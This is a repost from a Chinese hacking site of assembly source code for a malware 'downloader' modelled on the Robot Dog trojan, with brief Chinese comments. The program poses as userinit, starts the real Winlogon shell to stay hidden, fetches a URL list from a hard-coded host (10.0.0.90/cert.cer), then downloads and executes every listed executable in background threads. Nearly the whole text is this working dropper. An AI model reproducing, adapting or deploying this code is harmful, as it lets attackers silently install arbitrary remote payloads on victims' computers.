下载者源码
2008-07-22 17:16:51 www.hackbase.com 来源:互联网
整理了下,然后添了一点注释。不敢多添,怕自己理解错了被人笑。;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; 仿机器狗的感染文件代码; by naitm(http://hi.baidu.com/nai ...
|
整理了下,然后添了一点注释。不敢多添,怕自己理解错了被人笑。 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 仿机器狗的感染文件代码 ; by naitm(http://hi.baidu.com/naitm) ; ; ml /c /coff /nologo userinit.asm ; Link /align:0x10 /subsystem:windows /nologo userinit.obj ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .386 .model flat,stdcall option casemap:none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Include 文件定义 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib include Advapi32.inc includelib Advapi32.lib include wininet.inc includelib wininet.lib ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 数据段 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .data nThreadCount dd 0 szTempPath db '.',0 szValueName db 'Shell',0 szUser32Dll db 'user32.dll',0 szLoadRemoteFonts db 'LoadRemoteFonts',0 szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0 szUrlList db 'http://10.0.0.90/cert.cer',0 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 代码段 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;以当前进程的STARTUPINFO启动exe文件 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _RunIt proc @lpExePath local @stStartupInfo:STARTUPINFO local @stProcessInformation:PROCESS_INFORMATION invoke GetStartupInfo,addr @stStartupInfo invoke CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\ NULL,NULL,addr @stStartupInfo,addr @stProcessInformation .if eax == 0 invoke CloseHandle,@stProcessInformation.hThread invoke CloseHandle,@stProcessInformation.hProcess .endif ret _RunIt endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;下载文件 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _DownloadFile proc @lpURL,@lpSaveFile,@Buffer local @hInternet,@hInternetFile,@hLocalFile,@NumberOfBytesWritten,@nNumberOfBytesToWrite,@nWriteCount local @lpbuffer[200h]:BYTE xor eax,eax mov @nWriteCount,eax invoke InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0 .if eax != NULL mov @hInternet, eax invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4 invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4 invoke InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0 .if eax != NULL mov @hInternetFile, eax mov @nNumberOfBytesToWrite, 0 mov @NumberOfBytesWritten, 200h invoke HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\ addr @NumberOfBytesWritten,@nNumberOfBytesToWrite .if eax != NULL invoke CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0 .if eax != 0FFFFFFFFh mov @hLocalFile, eax .while TRUE mov @nNumberOfBytesToWrite,0 invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite .break .if (!eax) .break .if (@nNumberOfBytesToWrite==0) inc @nWriteCount invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0 .endw invoke SetEndOfFile,@hLocalFile invoke CloseHandle,@hLocalFile .endif .endif invoke InternetCloseHandle,@hInternetFile .endif invoke InternetCloseHandle,@hInternet .endif mov eax,@nWriteCount ret _DownloadFile endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _DownloadEXERunIt proc @lpURL local @DownTimes local @TempFileName[100h]:BYTE local @szUrl[100h]:BYTE mov @DownTimes,3Ch invoke lstrcpy,addr @szUrl,@lpURL invoke RtlZeroMemory,addr @TempFileName,100h invoke GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName .repeat invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h .if eax != NULL invoke _RunIt,addr @TempFileName .break .else invoke Sleep,3E8h dec @DownTimes .endif .until (!@DownTimes) dec nThreadCount ret _DownloadEXERunIt endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> start: main proc local @hKey,@nSizeOfPath,@hFile,@hObject,@lpBaseAddress local @szWinlogonPath[104h]:BYTE ;加载user32.dll,执行LoadRemoteFonts函数 (这函数是干吗的?) invoke LoadLibrary,offset szUser32Dll .if eax != NULL invoke GetProcAddress,eax,offset szLoadRemoteFonts .if eax != NULL call eax .endif .endif ;启动winlogon invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey .if eax == ERROR_SUCCESS mov @nSizeOfPath,104h invoke RtlZeroMemory,addr @szWinlogonPath,104h invoke RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath invoke _RunIt,addr @szWinlogonPath invoke RegCloseKey,@hKey .endif ;检查网络是否连接,不断重试 invoke Sleep,3E8h .while TRUE invoke InternetGetConnectedState,addr @nSizeOfPath,0 .break .if eax .endw ;取一个临时文件名,并下载列表 invoke RtlZeroMemory,addr @szWinlogonPath,104h invoke GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath invoke Sleep,3E8h DownloadList: .while TRUE invoke _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h .break .if eax .endw ;打开列表文件,验证后开始下载 invoke CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL .if eax != INVALID_HANDLE_VALUE mov @hFile,eax invoke GetFileSize,@hFile,NULL .if eax >= 0Fh ;文件提价小于F个字节则认为下载文件错误 invoke CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL .if eax != NULL mov @hObject,eax invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0 .if eax != NULL mov @lpBaseAddress,eax mov esi,eax BeginDownEXE: lea edi,@szWinlogonPath invoke RtlZeroMemory,edi,104h ;查找回车标志,查找到后将@szWinlogonPath传入_DownloadEXERunIt .repeat lodsb .if al == 0Ah lodsb .endif .if al == 0Dh .if @szWinlogonPath != 0 inc nThreadCount invoke CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath invoke CloseHandle,eax invoke Sleep,64h .endif jmp BeginDownEXE .endif stosb .until (!al) invoke UnmapViewOfFile,@lpBaseAddress .endif invoke CloseHandle,@hObject .endif .else invoke CloseHandle,@hFile jmp DownloadList .endif invoke CloseHandle,@hFile .else jmp DownloadList ;无法打开则重新下载 .endif ;不断sleep,直到所有线程结束 .while nThreadCount invoke Sleep,64h .endw invoke ExitProcess,0 main endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> end start |
责任编辑:黑客基地
本文引用网址:
